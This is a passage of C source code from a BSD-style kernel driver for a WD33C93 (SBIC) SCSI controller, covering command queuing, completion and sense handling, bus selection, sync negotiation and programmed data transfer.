dev->sc_cur->dc_count, dev->sc_dmacmd); #endif SBIC_TRACE(dev); } /* * used by specific sbic controller * * it appears that the higher level code does nothing with LUN's * so I will too. I could plug it in, however so could they * in scsi_scsi_cmd(). */ int sbic_scsicmd(xs) struct scsipi_xfer *xs; { struct sbic_acb *acb; struct sbic_softc *dev; struct scsipi_link *slp; int flags, s, stat; slp = xs->sc_link; dev = slp->adapter_softc; SBIC_TRACE(dev); flags = xs->flags; if (flags & SCSI_DATA_UIO) panic("sbic: scsi data uio requested"); if (dev->sc_nexus && flags & SCSI_POLL) panic("sbic_scsicmd: busy"); if (slp->scsipi_scsi.target == slp->scsipi_scsi.adapter_target) return ESCAPE_NOT_SUPPORTED; s = splbio(); acb = dev->free_list.tqh_first; if (acb) TAILQ_REMOVE(&dev->free_list, acb, chain); splx(s); if (acb == NULL) { #ifdef DEBUG printf("sbic_scsicmd: unable to queue request for target %d\n", slp->scsipi_scsi.target); #ifdef DDB Debugger(); #endif #endif xs->error = XS_DRIVER_STUFFUP; SBIC_TRACE(dev); return(TRY_AGAIN_LATER); } acb->flags = ACB_ACTIVE; if (flags & SCSI_DATA_IN) acb->flags |= ACB_DATAIN; acb->xs = xs; bcopy(xs->cmd, &acb->cmd, xs->cmdlen); acb->clen = xs->cmdlen; acb->sc_kv.dc_addr = xs->data; acb->sc_kv.dc_count = xs->datalen; #if 0 acb->pa_addr = xs->data ? (char *)kvtop(xs->data) : 0; /* XXXX check */ #endif if (flags & SCSI_POLL) { s = splbio(); /* * This has major side effects -- it locks up the machine */ dev->sc_flags |= SBICF_ICMD; do { while(dev->sc_nexus) sbicpoll(dev); dev->sc_nexus = acb; dev->sc_stat[0] = -1; dev->sc_xs = xs; dev->target = slp->scsipi_scsi.target; dev->lun = slp->scsipi_scsi.lun; stat = sbicicmd(dev, slp->scsipi_scsi.target, slp->scsipi_scsi.lun, &acb->cmd, acb->clen, acb->sc_kv.dc_addr, acb->sc_kv.dc_count); } while (dev->sc_nexus != acb); sbic_scsidone(acb, stat); splx(s); SBIC_TRACE(dev); return(COMPLETE); } s = splbio(); TAILQ_INSERT_TAIL(&dev->ready_list, acb, chain); if (dev->sc_nexus) { splx(s); SBIC_TRACE(dev); return(SUCCESSFULLY_QUEUED); } /* * nothing is active, try to start it now. */ sbic_sched(dev); splx(s); SBIC_TRACE(dev); /* TODO: add sbic_poll to do SCSI_POLL operations */ #if 0 if (flags & SCSI_POLL) return(COMPLETE); #endif return(SUCCESSFULLY_QUEUED); } /* * attempt to start the next available command */ void sbic_sched(dev) struct sbic_softc *dev; { struct scsipi_xfer *xs; struct scsipi_link *slp; struct sbic_acb *acb; int flags, /*phase,*/ stat, i; SBIC_TRACE(dev); if (dev->sc_nexus) return; /* a command is current active */ SBIC_TRACE(dev); for (acb = dev->ready_list.tqh_first; acb; acb = acb->chain.tqe_next) { slp = acb->xs->sc_link; i = slp->scsipi_scsi.target; if (!(dev->sc_tinfo[i].lubusy & (1 << slp->scsipi_scsi.lun))) { struct sbic_tinfo *ti = &dev->sc_tinfo[i]; TAILQ_REMOVE(&dev->ready_list, acb, chain); dev->sc_nexus = acb; slp = acb->xs->sc_link; ti = &dev->sc_tinfo[slp->scsipi_scsi.target]; ti->lubusy |= (1 << slp->scsipi_scsi.lun); acb->sc_pa.dc_addr = acb->pa_addr; /* XXXX check */ break; } } SBIC_TRACE(dev); if (acb == NULL) return; /* did not find an available command */ dev->sc_xs = xs = acb->xs; slp = xs->sc_link; flags = xs->flags; if (flags & SCSI_RESET) sbicreset(dev); #ifdef DEBUG if( data_pointer_debug > 1 ) printf("sbic_sched(%d,%d)\n",slp->scsipi_scsi.target,slp->scsipi_scsi.lun); #endif dev->sc_stat[0] = -1; dev->target = slp->scsipi_scsi.target; dev->lun = slp->scsipi_scsi.lun; if ( flags & SCSI_POLL || ( !sbic_parallel_operations && (/*phase == STATUS_PHASE ||*/ sbicdmaok(dev, xs) == 0) ) ) stat = sbicicmd(dev, slp->scsipi_scsi.target, slp->scsipi_scsi.lun, &acb->cmd, acb->clen, acb->sc_kv.dc_addr, acb->sc_kv.dc_count); else if (sbicgo(dev, xs) == 0) { SBIC_TRACE(dev); return; } else stat = dev->sc_stat[0]; sbic_scsidone(acb, stat); SBIC_TRACE(dev); } void sbic_scsidone(acb, stat) struct sbic_acb *acb; int stat; { struct scsipi_xfer *xs; struct scsipi_link *slp; struct sbic_softc *dev; /* int s;*/ int dosched = 0; xs = acb->xs; slp = xs->sc_link; dev = slp->adapter_softc; SBIC_TRACE(dev); #ifdef DIAGNOSTIC if (acb == NULL || xs == NULL) { printf("sbic_scsidone -- (%d,%d) no scsipi_xfer\n", dev->target, dev->lun); #ifdef DDB Debugger(); #endif return; } #endif /* * is this right? */ xs->status = stat; #ifdef DEBUG if( data_pointer_debug > 1 ) printf("scsidone: (%d,%d)->(%d,%d)%02x\n", slp->scsipi_scsi.target, slp->scsipi_scsi.lun, dev->target, dev->lun, stat); if( xs->sc_link->scsipi_scsi.target == dev->sc_link.scsipi_scsi.adapter_target ) panic("target == hostid"); #endif if (xs->error == XS_NOERROR && !(acb->flags & ACB_CHKSENSE)) { if (stat == SCSI_CHECK) { /* Schedule a REQUEST SENSE */ struct scsipi_sense *ss = (void *)&acb->cmd; #ifdef DEBUG if (report_sense) printf("sbic_scsidone: autosense %02x targ %d lun %d", acb->cmd.opcode, slp->scsipi_scsi.target, slp->scsipi_scsi.lun); #endif bzero(ss, sizeof(*ss)); ss->opcode = REQUEST_SENSE; ss->byte2 = slp->scsipi_scsi.lun << 5; ss->length = sizeof(struct scsipi_sense_data); acb->clen = sizeof(*ss); acb->sc_kv.dc_addr = (char *)&xs->sense.scsi_sense; acb->sc_kv.dc_count = sizeof(struct scsipi_sense_data); #if 0 acb->pa_addr = (char *)kvtop(&xs->sense.scsi_sense); /* XXX check */ #endif acb->flags = ACB_ACTIVE | ACB_CHKSENSE | ACB_DATAIN; bzero(acb->sc_kv.dc_addr, acb->clen); TAILQ_INSERT_HEAD(&dev->ready_list, acb, chain); dev->sc_tinfo[slp->scsipi_scsi.target].lubusy &= ~(1 << slp->scsipi_scsi.lun); dev->sc_tinfo[slp->scsipi_scsi.target].senses++; if (dev->sc_nexus == acb) { dev->sc_nexus = NULL; dev->sc_xs = NULL; sbic_sched(dev); } SBIC_TRACE(dev); return; } } if (xs->error == XS_NOERROR && (acb->flags & ACB_CHKSENSE)) { QPRINTF(("status = %0x\n", stat)); if (xs->sense.scsi_sense.error_code == 0) { struct scsipi_sense *ss = (void *)&acb->cmd; QPRINTF(("Retrying sense.\n")); bzero(ss, sizeof(*ss)); ss->opcode = REQUEST_SENSE; ss->byte2 = slp->scsipi_scsi.lun << 5; ss->length = sizeof(struct scsipi_sense_data); acb->clen = sizeof(*ss); acb->sc_kv.dc_addr = (char *)&xs->sense.scsi_sense; acb->sc_kv.dc_count = sizeof(struct scsipi_sense_data); acb->flags = ACB_ACTIVE | ACB_CHKSENSE | ACB_DATAIN; bzero(acb->sc_kv.dc_addr, acb->clen); TAILQ_INSERT_HEAD(&dev->ready_list, acb, chain); dev->sc_tinfo[slp->scsipi_scsi.target].lubusy &= ~(1 << slp->scsipi_scsi.lun); dev->sc_tinfo[slp->scsipi_scsi.target].senses++; if (dev->sc_nexus == acb) { dev->sc_nexus = NULL; dev->sc_xs = NULL; sbic_sched(dev); } SBIC_TRACE(dev); return; } xs->error = XS_SENSE; #ifdef DEBUG if (report_sense) printf(" => %02x %02x %02x\n", xs->sense.scsi_sense.error_code, xs->sense.scsi_sense.flags, xs->sense.scsi_sense.extra_bytes[3]); #endif } else { xs->resid = 0; /* XXXX */ } #if whataboutthisone case SCSI_BUSY: xs->error = XS_BUSY; break; #endif xs->flags |= ITSDONE; /* * Remove the ACB from whatever queue it's on. We have to do a bit of * a hack to figure out which queue it's on. Note that it is *not* * necessary to cdr down the ready queue, but we must cdr down the * nexus queue and see if it's there, so we can mark the unit as no * longer busy. This code is sickening, but it works. */ if (acb == dev->sc_nexus) { dev->sc_nexus = NULL; dev->sc_xs = NULL; dev->sc_tinfo[slp->scsipi_scsi.target].lubusy &= ~(1<<slp->scsipi_scsi.lun); if (dev->ready_list.tqh_first) dosched = 1; /* start next command */ } else if (dev->ready_list.tqh_last == &acb->chain.tqe_next) { TAILQ_REMOVE(&dev->ready_list, acb, chain); } else { register struct sbic_acb *acb2; for (acb2 = dev->nexus_list.tqh_first; acb2; acb2 = acb2->chain.tqe_next) { if (acb2 == acb) { TAILQ_REMOVE(&dev->nexus_list, acb, chain); dev->sc_tinfo[slp->scsipi_scsi.target].lubusy &= ~(1<<slp->scsipi_scsi.lun); break; } } if (acb2) ; else if (acb->chain.tqe_next) { TAILQ_REMOVE(&dev->ready_list, acb, chain); } else { printf("%s: can't find matching acb\n", dev->sc_dev.dv_xname); #ifdef DDB Debugger(); #endif } } /* Put it on the free list. */ acb->flags = ACB_FREE; TAILQ_INSERT_HEAD(&dev->free_list, acb, chain); dev->sc_tinfo[slp->scsipi_scsi.target].cmds++; scsipi_done(xs); if (dosched) sbic_sched(dev); SBIC_TRACE(dev); } int sbicdmaok(dev, xs) struct sbic_softc *dev; struct scsipi_xfer *xs; { if (sbic_no_dma || xs->datalen & 0x1 || (u_int)xs->data & 0x3) return(0); /* * controller supports dma to any addresses? */ else if ((dev->sc_flags & SBICF_BADDMA) == 0) return(1); /* * this address is ok for dma? */ else if (sbiccheckdmap(xs->data, xs->datalen, dev->sc_dmamask) == 0) return(1); /* * we have a bounce buffer? */ else if (dev->sc_tinfo[xs->sc_link->scsipi_scsi.target].bounce) return(1); /* * try to get one */ else panic("sbic: cannot do DMA\n"); #if 0 else if (dev->sc_tinfo[xs->sc_link->scsipi_scsi.target].bounce = (char *)alloc_z2mem(MAXPHYS)) { if (isztwomem(dev->sc_tinfo[xs->sc_link->scsipi_scsi.target].bounce)) printf("alloc ZII target %d bounce pa 0x%x\n", xs->sc_link->scsipi_scsi.target, kvtop(dev->sc_tinfo[xs->sc_link->scsipi_scsi.target].bounce)); else if (dev->sc_tinfo[xs->sc_link->scsipi_scsi.target].bounce) printf("alloc CHIP target %d bounce pa 0x%x\n", xs->sc_link->scsipi_scsi.target, PREP_DMA_MEM(dev->sc_tinfo[xs->sc_link->scsipi_scsi.target].bounce)); return(1); } #endif return(0); } int sbicwait(regs, until, timeo, line) sbic_regmap_p regs; char until; int timeo; int line; { u_char val; int csr; SBIC_TRACE((struct sbic_softc *)0); if (timeo == 0) timeo = 1000000; /* some large value.. */ GET_SBIC_asr(regs,val); while ((val & until) == 0) { if (timeo-- == 0) { GET_SBIC_csr(regs, csr); printf("sbicwait TIMEO @%d with asr=x%x csr=x%x\n", line, val, csr); #if defined(DDB) && defined(DEBUG) Debugger(); #endif return(val); /* Maybe I should abort */ break; } DELAY(1); GET_SBIC_asr(regs,val); } SBIC_TRACE((struct sbic_softc *)0); return(val); } int sbicabort(dev, regs, where) struct sbic_softc *dev; sbic_regmap_p regs; char *where; { u_char csr, asr; GET_SBIC_asr(regs, asr); GET_SBIC_csr(regs, csr); printf ("%s: abort %s: csr = 0x%02x, asr = 0x%02x\n", dev->sc_dev.dv_xname, where, csr, asr); #if 0 /* Clean up running command */ if (dev->sc_nexus != NULL) { dev->sc_nexus->xs->error = XS_DRIVER_STUFFUP; sbic_scsidone(dev->sc_nexus, dev->sc_stat[0]); } while (acb = dev->nexus_list.tqh_first) { acb->xs->error = XS_DRIVER_STUFFUP; sbic_scsidone(acb, -1 /*acb->stat[0]*/); } #endif /* Clean up chip itself */ if (dev->sc_flags & SBICF_SELECTED) { while( asr & SBIC_ASR_DBR ) { /* sbic is jammed w/data. need to clear it */ /* But we don't know what direction it needs to go */ GET_SBIC_data(regs, asr); printf("%s: abort %s: clearing data buffer 0x%02x\n", dev->sc_dev.dv_xname, where, asr); GET_SBIC_asr(regs, asr); if( asr & SBIC_ASR_DBR ) /* Not the read direction, then */ SET_SBIC_data(regs, asr); GET_SBIC_asr(regs, asr); } WAIT_CIP(regs); printf("%s: sbicabort - sending ABORT command\n", dev->sc_dev.dv_xname); SET_SBIC_cmd(regs, SBIC_CMD_ABORT); WAIT_CIP(regs); GET_SBIC_asr(regs, asr); if (asr & (SBIC_ASR_BSY|SBIC_ASR_LCI)) { /* ok, get more drastic.. */ printf("%s: sbicabort - asr %x, trying to reset\n", dev->sc_dev.dv_xname, asr); sbicreset(dev); dev->sc_flags &= ~SBICF_SELECTED; return -1; } printf("%s: sbicabort - sending DISC command\n", dev->sc_dev.dv_xname); SET_SBIC_cmd(regs, SBIC_CMD_DISC); do { asr = SBIC_WAIT (regs, SBIC_ASR_INT, 0); GET_SBIC_csr (regs, csr); CSR_TRACE('a',csr,asr,0); } while ((csr != SBIC_CSR_DISC) && (csr != SBIC_CSR_DISC_1) && (csr != SBIC_CSR_CMD_INVALID)); /* lets just hope it worked.. */ dev->sc_flags &= ~SBICF_SELECTED; } return -1; } /* * Initialize driver-private structures */ void sbicinit(dev) struct sbic_softc *dev; { sbic_regmap_p regs; u_int i; /* u_int my_id, s;*/ /* u_char csr;*/ struct sbic_acb *acb; u_int inhibit_sync; extern u_long scsi_nosync; extern int shift_nosync; #ifdef SBIC_DEBUG printf("sbicinit:\n"); #endif regs = dev->sc_sbicp; if ((dev->sc_flags & SBICF_ALIVE) == 0) { TAILQ_INIT(&dev->ready_list); TAILQ_INIT(&dev->nexus_list); TAILQ_INIT(&dev->free_list); dev->sc_nexus = NULL; dev->sc_xs = NULL; acb = dev->sc_acb; bzero(acb, sizeof(dev->sc_acb)); #ifdef SBIC_DEBUG printf("sbicinit: %d\n", __LINE__); #endif for (i = 0; i < sizeof(dev->sc_acb) / sizeof(*acb); i++) { TAILQ_INSERT_TAIL(&dev->free_list, acb, chain); acb++; } bzero(dev->sc_tinfo, sizeof(dev->sc_tinfo)); #ifdef DEBUG /* make sure timeout is really not needed */ timeout((void *)sbictimeout, dev, 30 * hz); #endif } else panic("sbic: reinitializing driver!"); #ifdef SBIC_DEBUG printf("sbicinit: %d\n", __LINE__); #endif dev->sc_flags |= SBICF_ALIVE; dev->sc_flags &= ~SBICF_SELECTED; /* initialize inhibit array */ if (scsi_nosync) { #ifdef SBIC_DEBUG printf("sbicinit: %d\n", __LINE__); #endif inhibit_sync = (scsi_nosync >> shift_nosync) & 0xff; shift_nosync += 8; #ifdef DEBUG if (inhibit_sync) printf("%s: Inhibiting synchronous transfer %02x\n", dev->sc_dev.dv_xname, inhibit_sync); #endif for (i = 0; i < 8; ++i) if (inhibit_sync & (1 << i)) sbic_inhibit_sync[i] = 1; } #ifdef SBIC_DEBUG printf("sbicinit: %d\n", __LINE__); #endif sbicreset(dev); } void sbicreset(dev) struct sbic_softc *dev; { sbic_regmap_p regs; u_int my_id, s; /* u_int i;*/ u_char csr; /* struct sbic_acb *acb;*/ #ifdef SBIC_DEBUG printf("sbicreset: %d\n", __LINE__); #endif regs = dev->sc_sbicp; #ifdef SBIC_DEBUG printf("sbicreset: regs = %08x\n", regs); #endif #if 0 if (dev->sc_flags & SBICF_ALIVE) { SET_SBIC_cmd(regs, SBIC_CMD_ABORT); WAIT_CIP(regs); } #else SET_SBIC_cmd(regs, SBIC_CMD_ABORT); #ifdef SBIC_DEBUG printf("sbicreset: %d\n", __LINE__); #endif WAIT_CIP(regs); #ifdef SBIC_DEBUG printf("sbicreset: %d\n", __LINE__); #endif #endif s = splbio(); my_id = dev->sc_link.scsipi_scsi.adapter_target & SBIC_ID_MASK; /* Enable advanced mode */ my_id |= SBIC_ID_EAF /*| SBIC_ID_EHP*/ ; SET_SBIC_myid(regs, my_id); #ifdef SBIC_DEBUG printf("sbicreset: %d\n", __LINE__); #endif /* * Disable interrupts (in dmainit) then reset the chip */ SET_SBIC_cmd(regs, SBIC_CMD_RESET); DELAY(25); SBIC_WAIT(regs, SBIC_ASR_INT, 0); GET_SBIC_csr(regs, csr); /* clears interrupt also */ if (dev->sc_clkfreq < 110) my_id |= SBIC_ID_FS_8_10; else if (dev->sc_clkfreq < 160) my_id |= SBIC_ID_FS_12_15; else if (dev->sc_clkfreq < 210) my_id |= SBIC_ID_FS_16_20; SET_SBIC_myid(regs, my_id); #ifdef SBIC_DEBUG printf("sbicreset: %d\n", __LINE__); #endif /* * Set up various chip parameters */ SET_SBIC_control(regs, SBIC_CTL_EDI | SBIC_CTL_IDI /* | SBIC_CTL_HSP */ | SBIC_MACHINE_DMA_MODE); /* * don't allow (re)selection (SBIC_RID_ES) * until we can handle target mode!! */ SET_SBIC_rselid(regs, SBIC_RID_ER); SET_SBIC_syn(regs, 0); /* asynch for now */ /* * anything else was zeroed by reset */ splx(s); #if 0 if ((dev->sc_flags & SBICF_ALIVE) == 0) { TAILQ_INIT(&dev->ready_list); TAILQ_INIT(&dev->nexus_list); TAILQ_INIT(&dev->free_list); dev->sc_nexus = NULL; dev->sc_xs = NULL; acb = dev->sc_acb; bzero(acb, sizeof(dev->sc_acb)); for (i = 0; i < sizeof(dev->sc_acb) / sizeof(*acb); i++) { TAILQ_INSERT_TAIL(&dev->free_list, acb, chain); acb++; } bzero(dev->sc_tinfo, sizeof(dev->sc_tinfo)); } else { if (dev->sc_nexus != NULL) { dev->sc_nexus->xs->error = XS_DRIVER_STUFFUP; sbic_scsidone(dev->sc_nexus, dev->sc_stat[0]); } while (acb = dev->nexus_list.tqh_first) { acb->xs->error = XS_DRIVER_STUFFUP; sbic_scsidone(acb, -1 /*acb->stat[0]*/); } } dev->sc_flags |= SBICF_ALIVE; #endif dev->sc_flags &= ~SBICF_SELECTED; } void sbicerror(dev, regs, csr) struct sbic_softc *dev; sbic_regmap_p regs; u_char csr; { struct scsipi_xfer *xs; xs = dev->sc_xs; #ifdef DIAGNOSTIC if (xs == NULL) panic("sbicerror"); #endif if (xs->flags & SCSI_SILENT) return; printf("%s: ", dev->sc_dev.dv_xname); printf("csr == 0x%02x\n", csr); /* XXX */ } /* * select the bus, return when selected or error. */ int sbicselectbus(dev, regs, target, lun, our_addr) struct sbic_softc *dev; sbic_regmap_p regs; u_char target, lun, our_addr; { u_char asr, csr, id; SBIC_TRACE(dev); QPRINTF(("sbicselectbus %d\n", target)); /* * if we're already selected, return (XXXX panic maybe?) */ if (dev->sc_flags & SBICF_SELECTED) { SBIC_TRACE(dev); return(1); } /* * issue select */ SBIC_TC_PUT(regs, 0); SET_SBIC_selid(regs, target); SET_SBIC_timeo(regs, SBIC_TIMEOUT(250,dev->sc_clkfreq)); /* * set sync or async */ if (dev->sc_sync[target].state == SYNC_DONE) SET_SBIC_syn(regs, SBIC_SYN (dev->sc_sync[target].offset, dev->sc_sync[target].period)); else SET_SBIC_syn(regs, SBIC_SYN (0, sbic_min_period)); GET_SBIC_asr(regs, asr); if( asr & (SBIC_ASR_INT|SBIC_ASR_BSY) ) { /* This means we got ourselves reselected upon */ /* printf("sbicselectbus: INT/BSY asr %02x\n", asr);*/ #ifdef DDB /* Debugger();*/ #endif SBIC_TRACE(dev); return 1; } SET_SBIC_cmd(regs, SBIC_CMD_SEL_ATN); /* * wait for select (merged from seperate function may need * cleanup) */ WAIT_CIP(regs); do { asr = SBIC_WAIT(regs, SBIC_ASR_INT | SBIC_ASR_LCI, 0); if (asr & SBIC_ASR_LCI) { #ifdef DEBUG if (reselect_debug) printf("sbicselectbus: late LCI asr %02x\n", asr); #endif SBIC_TRACE(dev); return 1; } GET_SBIC_csr (regs, csr); CSR_TRACE('s',csr,asr,target); QPRINTF(("%02x ", csr)); if( csr == SBIC_CSR_RSLT_NI || csr == SBIC_CSR_RSLT_IFY) { #ifdef DEBUG if(reselect_debug) printf("sbicselectbus: reselected asr %02x\n", asr); #endif /* We need to handle this now so we don't lock up later */ sbicnextstate(dev, csr, asr); SBIC_TRACE(dev); return 1; } if( csr == SBIC_CSR_SLT || csr == SBIC_CSR_SLT_ATN) { panic("sbicselectbus: target issued select!"); return 1; } } while (csr != (SBIC_CSR_MIS_2|MESG_OUT_PHASE) && csr != (SBIC_CSR_MIS_2|CMD_PHASE) && csr != SBIC_CSR_SEL_TIMEO); /* Enable (or not) reselection */ if(!sbic_enable_reselect && dev->nexus_list.tqh_first == NULL) SET_SBIC_rselid (regs, 0); else SET_SBIC_rselid (regs, SBIC_RID_ER); if (csr == (SBIC_CSR_MIS_2|CMD_PHASE)) { dev->sc_flags |= SBICF_SELECTED; /* device ignored ATN */ GET_SBIC_selid(regs, id); dev->target = id; GET_SBIC_tlun(regs,dev->lun); if( dev->lun & SBIC_TLUN_VALID ) dev->lun &= SBIC_TLUN_MASK; else dev->lun = lun; } else if (csr == (SBIC_CSR_MIS_2|MESG_OUT_PHASE)) { /* * Send identify message * (SCSI-2 requires an identify msg (?)) */ GET_SBIC_selid(regs, id); dev->target = id; GET_SBIC_tlun(regs,dev->lun); if( dev->lun & SBIC_TLUN_VALID ) dev->lun &= SBIC_TLUN_MASK; else dev->lun = lun; /* * handle drives that don't want to be asked * whether to go sync at all. */ if (sbic_inhibit_sync[id] && dev->sc_sync[id].state == SYNC_START) { #ifdef DEBUG if (sync_debug) printf("Forcing target %d asynchronous.\n", id); #endif dev->sc_sync[id].offset = 0; dev->sc_sync[id].period = sbic_min_period; dev->sc_sync[id].state = SYNC_DONE; } if (dev->sc_sync[id].state != SYNC_START){ if( dev->sc_xs->flags & SCSI_POLL || (dev->sc_flags & SBICF_ICMD) || !sbic_enable_reselect ) SEND_BYTE (regs, MSG_IDENTIFY | lun); else SEND_BYTE (regs, MSG_IDENTIFY_DR | lun); } else { /* * try to initiate a sync transfer. * So compose the sync message we're going * to send to the target */ #ifdef DEBUG if (sync_debug) printf("Sending sync request to target %d ... ", id); #endif /* * setup scsi message sync message request */ dev->sc_msg[0] = MSG_IDENTIFY | lun; dev->sc_msg[1] = MSG_EXT_MESSAGE; dev->sc_msg[2] = 3; dev->sc_msg[3] = MSG_SYNC_REQ; dev->sc_msg[4] = sbictoscsiperiod(dev, regs, sbic_min_period); dev->sc_msg[5] = sbic_max_offset; if (sbicxfstart(regs, 6, MESG_OUT_PHASE, sbic_cmd_wait)) sbicxfout(regs, 6, dev->sc_msg, MESG_OUT_PHASE); dev->sc_sync[id].state = SYNC_SENT; #ifdef DEBUG if (sync_debug) printf ("sent\n"); #endif } asr = SBIC_WAIT (regs, SBIC_ASR_INT, 0); GET_SBIC_csr (regs, csr); CSR_TRACE('y',csr,asr,target); QPRINTF(("[%02x]", csr)); #ifdef DEBUG if (sync_debug && dev->sc_sync[id].state == SYNC_SENT) printf("csr-result of last msgout: 0x%x\n", csr); #endif if (csr != SBIC_CSR_SEL_TIMEO) dev->sc_flags |= SBICF_SELECTED; } if (csr == SBIC_CSR_SEL_TIMEO) dev->sc_xs->error = XS_SELTIMEOUT; QPRINTF(("\n")); SBIC_TRACE(dev); return(csr == SBIC_CSR_SEL_TIMEO); } int sbicxfstart(regs, len, phase, wait) sbic_regmap_p regs; int len, wait; u_char phase; { u_char id; switch (phase) { case DATA_IN_PHASE: case MESG_IN_PHASE: GET_SBIC_selid (regs, id); id |= SBIC_SID_FROM_SCSI; SET_SBIC_selid (regs, id); SBIC_TC_PUT (regs, (unsigned)len); break; case DATA_OUT_PHASE: case MESG_OUT_PHASE: case CMD_PHASE: GET_SBIC_selid (regs, id); id &= ~SBIC_SID_FROM_SCSI; SET_SBIC_selid (regs, id); SBIC_TC_PUT (regs, (unsigned)len); break; default: SBIC_TC_PUT (regs, 0); } QPRINTF(("sbicxfstart %d, %d, %d\n", len, phase, wait)); return(1); } int sbicxfout(regs, len, bp, phase) sbic_regmap_p regs; int len; void *bp; int phase; { u_char orig_csr, asr, *buf; /* u_char csr;*/ int wait; buf = bp; wait = sbic_data_wait; QPRINTF(("sbicxfout {%d} %02x %02x %02x %02x %02x " "%02x %02x %02x %02x %02x\n", len, buf[0], buf[1], buf[2], buf[3], buf[4], buf[5], buf[6], buf[7], buf[8], buf[9])); #ifdef UNPROTECTED_CSR GET_SBIC_csr (regs, orig_csr); CSR_TRACE('>',orig_csr,0,0); #endif /* * sigh.. WD-PROTO strikes again.. sending the command in one go * causes the chip to lock up if talking to certain (misbehaving?) * targets. Anyway, this procedure should work for all targets, but * it's slightly slower due to the overhead */ WAIT_CIP (regs); SET_SBIC_cmd (regs, SBIC_CMD_XFER_INFO); for (;len > 0; len--) { GET_SBIC_asr (regs, asr); while ((asr & SBIC_ASR_DBR) == 0) { if ((asr & SBIC_ASR_INT) || --wait < 0) { #ifdef DEBUG if (sbic_debug) printf("sbicxfout fail: l%d i%x w%d\n", len, asr, wait); #endif return (len); } /* DELAY(1);*/ GET_SBIC_asr (regs, asr); } SET_SBIC_data (regs, *buf); buf++; } SBIC_TC_GET(regs, len); QPRINTF(("sbicxfout done %d bytes\n", len)); /* * this leaves with one csr to be read */ return(0); } /* returns # bytes left to read */ int sbicxfin(regs, len, bp) sbic_regmap_p regs; int len; void *bp; { int wait; /* int read;*/ u_char *obp, *buf; u_char orig_csr, csr, asr; wait = sbic_data_wait; obp = bp; buf = bp; #ifdef UNPROTECTED_CSR GET_SBIC_csr (regs, orig_csr); CSR_TRACE('<',orig_csr,0,0); QPRINTF(("sbicxfin %d, csr=%02x\n", len, orig_csr)); #endif WAIT_CIP (regs); SET_SBIC_cmd (regs, SBIC_CMD_XFER_INFO); for (;len > 0; len--) { GET_SBIC_asr (regs, asr); if((asr & SBIC_ASR_PE)) { #ifdef DEBUG printf("sbicxfin parity error: l%d i%x w%d\n", len, asr, wait); /* return ((unsigned long)buf - (unsigned long)bp); */ #ifdef DDB Debugger(); #endif #endif } while ((asr & SBIC_ASR_DBR) == 0) { if ((asr & SBIC_ASR_INT) || --wait < 0) { #ifdef DEBUG if (sbic_debug) { QPRINTF(("sbicxfin fail:{%d} %02x %02x %02x %02x %02x %02x " "%02x %02x %02x %02x\n", len, obp[0], obp[1], obp[2], obp[3], obp[4], obp[5], obp[6], obp[7], obp[8], obp[9])); printf("sbicxfin fail: l%d i%x w%d\n", len, asr, wait); } #endif return len; } #ifdef UNPROTECTED_CSR if( ! asr & SBIC_ASR_BSY ) { GET_SBIC_csr(regs, csr); CSR_TRACE('<',csr,asr,len); QPRINTF(("[CSR%02xASR%02x]", csr, asr)); } #endif /* DELAY(1);*/ GET_SBIC_asr (regs, asr); } GET_SBIC_data (regs, *buf); /* QPRINTF(("asr=%02x, csr=%02x, data=%02x\n", asr, csr, *buf));*/ buf++; } QPRINTF(("sbicxfin {%d} %02x %02x %02x %02x %02x %02x " "%02x %02x %02x %02x\n", len, obp[0], obp[1], obp[2], obp[3], obp[4], obp[5], obp[6], obp[7], obp[8], obp[9])); /* this leaves with one csr to be read */ return len; } /* * SCSI 'immediate' command: issue a command to some SCSI device * and get back an 'immediate' response (i.e., do programmed xfer * to get the response data). 'cbuf' is a buffer containing a scsi * command of length clen bytes. 'buf' is a buffer of length 'len' * bytes for data. The transfer direction is determined by the device * (i.e., by the scsi bus data xfer phase). If 'len' is zero, the * command must supply no data. */ int sbicicmd(dev, target, lun, cbuf, clen, buf, len) struct sbic_softc *dev; void *cbuf, *buf; int clen, len; { sbic_regmap_p regs; u_char phase, csr, asr; int wait; /* int newtarget, cmd_sent, parity_err;*/ struct sbic_acb *acb; /* int discon;*/ int i; #define CSR_LOG_BUF_SIZE 0 #if CSR_LOG_BUF_SIZE int bufptr; int csrbuf[CSR_LOG_BUF_SIZE]; bufptr=0; #endif SBIC_TRACE(dev); regs = dev->sc_sbicp; acb = dev->sc_nexus; /* Make sure pointers are OK */ dev->sc_last = dev->sc_cur = &acb->sc_pa; dev->sc_tcnt = acb->sc_tcnt = 0; acb->sc_pa.dc_count = 0; /* No DMA */ acb->sc_kv.dc_addr = buf; acb->sc_kv.dc_count = len; #ifdef DEBUG routine = 3; debug_sbic_regs = regs; /* store this to allow debug calls */ if( data_pointer_debug > 1 ) printf("sbicicmd(%d,%d):%d\n", target, lun, acb->sc_kv.dc_count); #endif /* * set the sbic into non-DMA mode */ SET_SBIC_control(regs, SBIC_CTL_EDI | SBIC_CTL_IDI /*| SBIC_CTL_HSP*/); dev->sc_stat[0] = 0xff; dev->sc_msg[0] = 0xff; i = 1; /* pre-load */ /* We're stealing the SCSI bus */ dev->sc_flags |= SBICF_ICMD; do { /* * select the SCSI bus (it's an error if bus isn't free) */ if (!( dev->sc_flags & SBICF_SELECTED ) && sbicselectbus(dev, regs, target, lun, dev->sc_scsiaddr)) { /*printf("sbicicmd trying to select busy bus!\n");*/ dev->sc_flags &= ~SBICF_ICMD; return(-1); } /* * Wait for a phase change (or error) then let the device sequence * us through the various SCSI phases. */ wait = sbic_cmd_wait; asr = GET_SBIC_asr (regs, asr); GET_SBIC_csr (regs, csr); CSR_TRACE('I',csr,asr,target); QPRINTF((">ASR:%02xCSR:%02x<", asr, csr)); #if CSR_LOG_BUF_SIZE csrbuf[bufptr++] = csr; #endif switch (csr) { case SBIC_CSR_S_XFERRED: case SBIC_CSR_DISC: case SBIC_CSR_DISC_1: dev->sc_flags &= ~SBICF_SELECTED; GET_SBIC_cmd_phase (regs, phase); if (phase == 0x60) { GET_SBIC_tlun (regs, dev->sc_stat[0]); i = 0; /* done */ /* break;*/ /* Bypass all the state gobldygook */ } else { #ifdef DEBUG if(reselect_debug>1) printf("sbicicmd: handling disconnect\n"); #endif i = SBIC_STATE_DISCONNECT; } break; case SBIC_CSR_XFERRED|CMD_PHASE: case SBIC_CSR_MIS|CMD_PHASE: case SBIC_CSR_MIS_1|CMD_PHASE: case SBIC_CSR_MIS_2|CMD_PHASE: if (sbicxfstart(regs, clen, CMD_PHASE, sbic_cmd_wait)) if (sbicxfout(regs, clen, cbuf, CMD_PHASE)) i = sbicabort(dev, regs,"icmd sending 